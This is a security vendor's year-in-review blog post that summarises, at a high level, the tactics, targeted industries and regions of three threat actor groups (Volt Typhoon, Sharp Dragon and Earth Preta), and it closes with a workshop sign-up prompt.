Threat Thursday: 2024 in Review

The cybersecurity landscape continues to evolve, with threat actors targeting critical infrastructure, government entities, and industries worldwide. SCYTHE’s emulation and analysis of these threats provide invaluable insights to strengthen defenses. Below, we highlight some of the most pressing threats we’ve tackled this year, detailing their tactics, the industries impacted, and the regions they target.

Volt Typhoon: A Persistent Threat to Critical Infrastructure

Volt Typhoon represents a significant threat, as identified by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI). These attacks are attributed to state-sponsored cyber actors from the People's Republic of China (PRC). Volt Typhoon’s campaign focuses on infiltrating IT networks to pre-position malicious actors, intending to disrupt or potentially destroying critical infrastructure—a strategy aligned with geopolitical tensions or military conflicts.

Key Tactics:

  • Living off the land binaries and scripts (LOLBAS) to avoid detection

  • Exploiting valid accounts for persistence

  • Maintaining long-term intrusions, some undetected for over five years

Targeted Industries:

‣ Energy

Communications

‣ Transportation Systems

‣ Water and Wastewater Systems


Targeted Regions/Countries:

‣ United States

‣ Australia

‣ Canada

‣ Guam

‣ New Zealand


By emulating these tactics, SCYTHE equips organizations to identify vulnerabilities and mitigate risks posed by such advanced campaigns.

Sharp Dragon: Exploiting Trusted Relationships

Sharp Dragon, a Chinese threat actor, primarily targets government entities to gain initial access and facilitate lateral movement. By compromising trusted organizations, Sharp Dragon amplifies its impact, infiltrating systems across multiple regions.

Key Tactics:

  • Exploiting trust in compromised governmental networks

  • Lateral movement to extend access

  • Sophisticated phishing campaigns

Targeted Industries:

‣ Government


Targeted Regions/Countries:

‣ Southeast Asia

‣ Africa

‣ Caribbean


SCYTHE’s simulations of Sharp Dragon’s tactics emphasize the importance of securing inter-organizational trust relationships and monitoring for subtle anomalies in system behavior.

Earth Preta: An Evolving Threat Across the Pacific

Earth Preta (also known as Mustang Panda or Stately Taurus) continues to refine its techniques, targeting educational, research, and governmental institutions. This group focuses on the Pacific region, employing novel tools, upgraded malware, and creative attack vectors.

Key Tactics:

  • Utilizing removable drives like BADUSB or FlipperZero for initial access

  • Persistence through registry modifications, Run keys, and scheduled tasks

  • Exfiltration via FTP using curl

  • Deployment of custom DLLs for command-and-control (C2) communication

Targeted Industries:

‣ Government

‣ Non-Profits

‣ Religious Organizations


Targeted Regions/Countries:

‣ Japan

‣ Australia

‣ Myanmar

‣ Mongolia

‣ Vietnam

‣ Pakistan

‣ United States


SCYTHE’s emulation campaigns model these behaviors to help organizations bolster defenses against emerging tactics.

Strengthening Cyber Defenses

Threat actors like Volt Typhoon, Sharp Dragon, and Earth Preta highlight the evolving risks faced by critical infrastructure and industries worldwide. By analyzing and emulating these campaigns, SCYTHE empowers organizations to prepare for the threats of tomorrow. Stay tuned for our upcoming Threat Thursday Live sessions, where we’ll dive deeper into emerging risks and the strategies needed to counter them.

REGISTER: for all upcoming workshops and Threat Thursday Live

Register today! 🦄